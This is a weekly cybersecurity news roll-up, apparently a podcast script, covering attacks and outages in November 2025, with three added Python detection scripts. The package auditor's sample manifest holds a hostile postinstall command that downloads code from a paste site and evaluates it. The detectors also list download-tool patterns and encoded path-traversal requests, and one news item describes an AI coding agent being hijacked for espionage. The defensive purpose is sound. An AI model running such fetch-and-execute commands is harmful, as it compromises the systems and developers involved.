Weekly Update: Cyber News for the Week ending 21 November, 2025

This is your weekly cyber news roll-up for the week ending November 21st, 2025.

You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news.

Jaguar Land Rover is still absorbing the shock from a cyberattack that forced factory shutdowns for almost six weeks. Production lines went quiet across plants, starving the supply chain and helping to drive seven hundred fifty million dollars in quarterly losses. The financial hit goes well beyond lost output. Direct response work, including forensics and emergency technology fixes, added an estimated two hundred million dollars in cost on top of the missed production. Suppliers, workers, and even the United Kingdom government were pulled into the crisis as loan guarantees and cash flow support became necessary, showing how one digital intrusion can turn into a lingering business emergency for highly automated manufacturers.

Attackers assessed to be a China aligned group abused an artificial intelligence coding agent to run a largely automated espionage campaign. The hijacked tool carried out reconnaissance, vulnerability discovery, exploitation steps, credential theft, and even analysis of stolen data across about thirty high value targets in finance, chemicals, technology, and government. That automation let a small human team move quickly. Organizations with valuable intellectual property and complex cloud footprints are most exposed, especially where automated, script like probing that originates from cloud infrastructure is not closely watched. For now, the provider has shut down the malicious accounts and shared indicators, but defenders need new hunting rules for agent driven intrusions and logging that can keep up with much faster, machine assisted attack chains.

North Korean operators are leaning deeper into the software supply chain by hiding malware inside developer tools and projects that appear legitimate at first glance. Their tactic is to trojanize code or utilities that developers might download, then quietly pull follow on payloads from text based storage services once the project runs in a trusted environment. The initial package looks harmless to many filters. Teams that rely on open source tools or shared snippets without rigorous validation are most affected, because compromised code can end up in build systems and production workloads. As this campaign continues, leaders and defenders are under pressure to improve dependency management, code signing, and build isolation, and to watch for unusual outbound connections or new processes on developer and build servers that point to poisoned projects.
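One concrete check that follows from the trojanized developer tool item above is to audit a package manifest before it is installed, since npm style lifecycle hooks such as preinstall and postinstall run automatically during installation and are a common place to hide a fetch from a text or paste storage service. The script below is an added example and not code from the original page or from any vendor; the manifest, the list of paste style hosts, and the package name are constructed for the demonstration.

```python
"""Flag package manifests whose install-time lifecycle scripts fetch remote content.

Added example, not from the original page. It inspects an npm-style package.json
and reports preinstall/install/postinstall/prepare scripts that invoke download
tools, reference URLs, or run inline or decoded code. Hosts commonly used for
text/paste storage are weighted higher. The manifest and host list are constructed.
"""
import json
import re

# Lifecycle hooks that npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed list of text/paste storage hosts; extend from your own telemetry.
PASTE_HOSTS = ("pastebin.com", "paste.ee", "hastebin.com", "gist.githubusercontent.com")

DOWNLOAD_TOOLS = re.compile(r"\b(curl|wget|iwr|Invoke-WebRequest)\b|\bfetch\(", re.IGNORECASE)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)[^\s\"']*")
INLINE_EVAL = re.compile(r"\bnode\s+-e\b|\beval\(|base64\s+(-d|--decode)\b", re.IGNORECASE)


def is_paste_host(host: str) -> bool:
    """True if host is, or is a subdomain of, a known text-storage host."""
    host = host.lower()
    return any(host == p or host.endswith("." + p) for p in PASTE_HOSTS)


def audit_manifest(manifest_text: str) -> list:
    """Return findings as (hook, severity, reason) tuples, in manifest order."""
    pkg = json.loads(manifest_text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in INSTALL_HOOKS:
            continue  # test/build scripts are not run by a plain install
        hosts = URL_RE.findall(cmd)
        paste_hosts = [h for h in hosts if is_paste_host(h)]
        if paste_hosts:
            findings.append((hook, "high", "fetches from text-storage host: " + ",".join(paste_hosts)))
        elif hosts or DOWNLOAD_TOOLS.search(cmd):
            findings.append((hook, "medium", "downloads remote content at install time"))
        if INLINE_EVAL.search(cmd):
            findings.append((hook, "high", "executes inline or decoded code"))
    return findings


# Constructed manifest: a harmless-looking utility with a poisoned postinstall hook.
SAMPLE_MANIFEST = json.dumps({
    "name": "left-pad-utils",  # hypothetical package name
    "version": "1.0.3",
    "scripts": {
        "test": "node test.js",
        "postinstall": "curl -s https://pastebin.com/raw/abcd1234 | "
                       "node -e \"eval(require('fs').readFileSync(0,'utf8'))\"",
        "prepare": "node scripts/build.js",
    },
})

if __name__ == "__main__":
    for hook, severity, reason in audit_manifest(SAMPLE_MANIFEST):
        print(f"[{severity}] {hook}: {reason}")
```

Run it against each package.json in a lockfile's dependency tree as a pre-install gate in CI; the medium findings are noisy on their own, but a high finding from a paste host combined with inline evaluation is the exact pattern the item above describes.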

In Pennsylvania, the state attorney general’s office has confirmed that an August cyberattack led to the theft of files containing personal and medical information. The stolen data includes legal case material and health records about people who interacted with the office, making each record unusually sensitive. Public trust is at stake here. Healthcare providers, insurers, and government partners may now see increased fraud attempts, extortion, or pressure campaigns based on stolen details about medical conditions and legal issues. This week the office is reviewing how its case management and storage systems handle regulated data, notifying affected individuals, and working with security teams to segment high risk repositories and tighten access and monitoring.

Fortinet’s FortiWeb web application firewalls are also under active attack through a critical vulnerability that allows unauthenticated attackers to run commands and gain administrator level control. By sending crafted requests to internet facing instances, intruders can effectively take over management of the front end protections for business critical sites and services. Older or unpatched versions are at greatest risk. For organizations that depend on these appliances as their primary shield, this week is a warning that perimeter tools need aggressive patching, restricted management exposure, and regular configuration review. Researchers are already seeing real world exploitation, so defenders should inventory every deployment, lock down management access, and comb logs for configuration changes or unexpected outbound traffic from the devices.

Microsoft reports that its Azure cloud recently absorbed a record breaking distributed denial of service attack that peaked at fifteen point seven terabits per second. The assault used a botnet called Aisuru built from more than half a million compromised internet connected devices, hammering both bandwidth and application layers for targeted services. Those numbers are genuinely staggering today. Even when the platform successfully soaks up the traffic, customers can still face degraded performance, noisy alerts, and unexpected cost spikes from autoscaling and protective measures. Organizations that rely heavily on Azure hosted services or public facing application programming interfaces should treat this week as a prompt to revisit availability objectives, tune protections, and rehearse communications for future large scale floods.

Cloudflare triggered a brief but wide reaching outage when a misconfigured update overloaded parts of its global network and caused many sites to fail. Users who tried to reach popular social platforms, collaboration tools, and retailers instead saw timeouts or gateway error pages in their browsers. The disruption came from an internal mistake. Engineers began rolling back the configuration within hours, and most customers regained service the same day, though some saw lingering instability during traffic rebalancing. For organizations that front critical portals, payment flows, or application programming interfaces through a single edge provider, this outage is a reminder to treat external platforms as potential single points of failure and to design failover and monitoring plans accordingly.

Fortinet has now shipped a security update for FortiWeb to address a web application firewall vulnerability that attackers are already targeting in the wild. The issue allows remote code execution on exposed appliances, giving an intruder control over a device that often sits directly in front of critical applications and customer portals. Adoption of the fix appears uneven so far. Security researchers and vendors are seeing ongoing opportunistic scanning for unpatched FortiWeb systems, which can allow attackers to alter traffic inspection, plant backdoors, or pivot deeper into network segments behind the firewall. This week leaders and defenders need to identify every deployment, confirm versions against vendor guidance, and review logs for signs of probing or unusual administrative access before and after patching.

A long running campaign dubbed Operation WrtHug has quietly taken over tens of thousands of old ASUS home and small office routers. Attackers chained several known firmware flaws to gain persistent control of these end of life devices, many of which sit at the edge of small businesses and remote workers. The scale of the hijack is striking. Most of the affected hardware appears to be in Asia and Europe, with measurable exposure in North America, and many owners have no patch path or even awareness that their routers now sit inside an attacker controlled network. For organizations that depend on home and branch connectivity for remote access, this week underscores the need to require supported routers, block known bad router address ranges, and mine firewall and virtual private network logs for unusual activity coming from employee locations.

Cloudflare’s most disruptive outage in six years has sparked broader questions about how much of the internet now hinges on a few key providers. A routine configuration change in its bot protection systems produced an oversized data file that overloaded critical components and cascaded into widespread failures for websites, internal tools, and third party services. Many customers saw multiple independent services fail at once. Recovery took several hours, and even after core traffic returned, some control plane features and client tools stayed degraded, leaving incident responders with reduced visibility when they most needed it. This week the outage is prompting leaders and defenders to revisit dependency maps, design manual fallbacks, and ensure that key monitoring and communication channels do not all run through the same cloud paths that can fail together.

The United States, United Kingdom, and Australia have jointly announced sanctions on a Russian hosting company accused of providing bulletproof infrastructure to major ransomware gangs. Authorities say the firm and its affiliates ignored abuse reports and helped attackers keep servers online during earlier investigations and takedowns, effectively acting as an enabler for repeated attacks on hospitals, schools, and private industry. The sanctions raise the legal stakes for anyone who transacts with the provider, including banks and payment processors. For security and compliance teams, this week’s action signals that governments are willing to treat enabling infrastructure providers as direct participants in cybercrime rather than neutral carriers. Organizations should expect more scrutiny of how they vet hosting, cloud, and payment partners tied to high risk regions, and defenders can use sanctions data to sharpen blocklists and detection focus on newly flagged networks and address ranges.
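Both the router hijack item and the sanctions item above end with the same practical step: take a set of address ranges (compromised router blocks, or netblocks tied to a sanctioned provider) and check remote access logs against them. The script below is an added example, not code from the original page or from any vendor. The CIDRs are the RFC 5737 and RFC 3849 documentation ranges standing in for a real feed, the virtual private network log format is a constructed key value style, and the hostname and usernames are made up.

```python
"""Match VPN login sources against a CIDR blocklist.

Added example, not from the original page. build_blocklist() merges overlapping
and adjacent ranges so each lookup scans fewer networks; scan_vpn_log() parses
constructed key=value VPN lines and reports logins from blocked ranges.
"""
import ipaddress
import re

# Constructed blocklist. In practice this comes from sanctions advisories and
# botnet or router-compromise indicator feeds; these are documentation ranges.
BLOCKLIST_CIDRS = ["192.0.2.0/24", "198.51.100.0/25", "203.0.113.64/26", "2001:db8::/32"]

# Constructed log format: "<ts> <gateway> user=<u> src=<ip> action=<a> result=<r>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\S+\s+user=(?P<user>\S+)\s+src=(?P<src>\S+)\s+"
    r"action=(?P<action>\S+)\s+result=(?P<result>\S+)"
)


def build_blocklist(cidrs):
    """Parse CIDRs and collapse each address family separately (collapse_addresses
    refuses mixed v4/v6 input). Returns a list of ip_network objects."""
    nets = [ipaddress.ip_network(c, strict=False) for c in cidrs]
    v4 = [n for n in nets if n.version == 4]
    v6 = [n for n in nets if n.version == 6]
    return list(ipaddress.collapse_addresses(v4)) + list(ipaddress.collapse_addresses(v6))


def matching_network(addr, blocklist):
    """Return the first blocked network containing addr, or None.
    Raises ValueError for a malformed address (caller decides how to treat it)."""
    ip = ipaddress.ip_address(addr)
    for net in blocklist:
        if ip.version == net.version and ip in net:
            return net
    return None


def scan_vpn_log(lines, blocklist):
    """Return one dict per login that originated from a blocked range."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a login record in the expected format
        try:
            net = matching_network(m["src"], blocklist)
        except ValueError:
            continue  # malformed src field; worth its own alert in production
        if net is not None:
            hits.append({"ts": m["ts"], "user": m["user"], "src": m["src"],
                         "network": str(net), "result": m["result"]})
    return hits


# Constructed sample log lines.
SAMPLE_LOG = [
    "2025-11-19T08:12:44Z vpn-gw1 user=alice src=203.0.113.70 action=login result=success",
    "2025-11-19T08:13:02Z vpn-gw1 user=bob src=198.51.100.200 action=login result=success",
    "2025-11-19T08:15:10Z vpn-gw1 user=carol src=192.0.2.9 action=login result=failure",
    "2025-11-19T08:16:33Z vpn-gw1 user=dave src=2001:db8::1 action=login result=success",
    "2025-11-19T08:17:01Z vpn-gw1 user=erin src=not-an-ip action=login result=success",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for hit in scan_vpn_log(SAMPLE_LOG, build_blocklist(BLOCKLIST_CIDRS)):
        print(f"{hit['ts']} {hit['user']} from {hit['src']} in blocked {hit['network']} ({hit['result']})")
```

Note that a successful login from a blocked range is the interesting case for the router item: the employee is probably sitting behind a hijacked router, so the account itself is not necessarily compromised, but the session traffic is passing through attacker controlled equipment.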

Another FortiWeb issue in the spotlight this week is a critical new vulnerability that is already under active attack against internet facing devices. The flaw allows unauthenticated attackers to abuse path traversal tricks and reach full administrative control, turning a web application firewall into a powerful foothold. Security telemetry shows opportunistic scanning rather than isolated probes. The United States Cybersecurity and Infrastructure Security Agency, C I S A, has added the bug to its known exploited vulnerability catalog and ordered federal agencies to patch within seven days, underscoring how urgent this patch cycle is. Enterprises that rely on FortiWeb to front high value portals and application programming interfaces should move quickly to identify every instance, apply fixes, and review logs for suspicious administrative actions or configuration changes that may signal deeper compromise.

Iran aligned hackers have demonstrated what researchers call cyber enabled kinetic targeting by using digital surveillance of a commercial ship to guide a real world missile strike that ultimately failed. They pulled detailed location information from the vessel’s automatic identification system, A I S, and combined it with access to onboard cameras to track crew movements and position in near real time. Ordinary safety and navigation tools became targeting aids. The campaign appears to be part of a broader pattern in which military or proxy groups quietly map maritime traffic and collect intelligence on high value ships operating in contested regions. Shipping lines and energy firms now need cyber and physical security teams working from one playbook, hardening gateways, satellite modems, and cameras, and monitoring for unusual access and traffic spikes around vessels at risk.

A China linked group has spent three years running a spying campaign built around a custom malware family known as BadAudio. The malware often hides behind seemingly harmless files or installers, acting as a stealthy first stage downloader that establishes a foothold and then pulls in additional payloads to support credential theft, lateral movement, and data exfiltration. Targets include agencies, telecom operators, and technology firms. Despite evolving delivery methods that range from spear phishing to tampered software packages, the campaign’s core goal remains long term, low noise access to sensitive networks. For national infrastructure operators and large enterprises, this week’s analysis reinforces the need for controls on software installation, strict allow lists for update sources, and expanded threat hunting focused on stealthy command and control traffic from newly installed or rarely used applications.

Fortinet has also warned customers about a command injection flaw in FortiWeb that attackers are actively exploiting through the management interface. The bug allows anyone with access to that interface to run system level commands on the appliance, and researchers note that it can be combined with the separate path traversal issue to reach effective full control. Because these appliances sit directly in front of critical applications, they are prime targets. The vulnerability affects multiple software versions, and Fortinet has released patches and interim mitigations while official exploited vulnerability lists now include the issue. Organizations that rely on FortiWeb to protect customer facing sites should move quickly to patch, lock down internet reachable management access, and review recent logs for unexpected administrator logins or scripted sequences of configuration changes and command outputs.
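The FortiWeb items above repeatedly advise reviewing logs for the path traversal probing that precedes the administrative takeover, and a common mistake in that review is decoding request paths only once, which misses double encoded traversal. The script below is an added example, not code from the original page or from Fortinet, and it does not reproduce any FortiWeb specific request: it normalizes request targets from constructed combined format access log lines and flags any path that still contains a `..` segment after repeated decoding. The `/admin/` prefix in the sample lines is hypothetical.

```python
"""Detect path traversal in web access logs, including multi-layer percent encoding.

Added example, not from the original page. normalize_path() strips the query
string, percent-decodes until the string stops changing (bounded), and unifies
backslashes; scan_access_log() flags requests whose decoded path contains a
".." segment and records how many encoding layers hid it. Log lines are constructed.
"""
import re
from urllib.parse import unquote

# Combined/common log format prefix: src ident user [ts] "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def normalize_path(raw_target, max_rounds=3):
    """Return (decoded_path, encoding_layers). Decoding is repeated so that
    %252e%252e (double encoded) is reduced to '..' just like %2e%2e is."""
    path = raw_target.split("?", 1)[0]
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
        rounds += 1
    return path.replace("\\", "/"), rounds


def has_traversal(path):
    """True if any path segment is exactly '..'. Segment-wise matching avoids false
    positives on names like 'release..notes.html'."""
    return ".." in path.split("/")


def scan_access_log(lines):
    """Return one dict per traversal attempt found in the log lines."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access log record in the expected format
        path, layers = normalize_path(m["target"])
        if has_traversal(path):
            alerts.append({"src": m["src"], "method": m["method"], "raw": m["target"],
                           "decoded": path, "encoding_layers": layers,
                           "status": int(m["status"])})
    return alerts


# Constructed sample lines; the /admin/ paths are hypothetical.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Nov/2025:10:01:02 +0000] "GET /index.html HTTP/1.1" 200',
    '203.0.113.5 - - [19/Nov/2025:10:01:05 +0000] "GET /api/../../admin/config HTTP/1.1" 403',
    '198.51.100.7 - - [19/Nov/2025:10:02:11 +0000] "POST /api/%2e%2e/%2e%2e/admin/users?x=1 HTTP/1.1" 200',
    '198.51.100.7 - - [19/Nov/2025:10:02:13 +0000] "GET /static/%252e%252e%252fadmin/config HTTP/1.1" 200',
    '192.0.2.44 - - [19/Nov/2025:10:03:00 +0000] "GET /docs/release..notes.html HTTP/1.1" 200',
]

if __name__ == "__main__":
    for a in scan_access_log(SAMPLE_LOG):
        print(f"{a['src']} {a['method']} {a['raw']} -> {a['decoded']} "
              f"(layers={a['encoding_layers']}, status={a['status']})")
```

A traversal request that returned a 2xx status, as in the third and fourth sample lines, deserves immediate follow up, because a 403 shows the front end rejected it while a 200 suggests the normalization on the device side reached something it should not have.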

Salesforce is investigating unusual activity involving customer managed apps from Gainsight that may have exposed some Salesforce customer data through high privilege integrations. The incident centers on integration flows that use token based connections, where Gainsight published applications connect into customer environments with wide permission to read and write sensitive records, and such connections often carry far broader privileges than the integration actually needs. As a precaution, Salesforce has revoked existing access tokens for those apps while working with Gainsight to understand what was accessed and by whom. This week companies that treat Salesforce as a customer data hub should inventory all connected applications, review permissions and logs for unusual queries or exports tied to Gainsight related apps, and tighten token rotation and alerting on high volume data pulls.

That’s the BareMetalCyber Weekly Roll-Up for the week ending November 21st, 2025. For more, visit BareMetalCyber dot com. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber news dot com. We’ll be back next week.
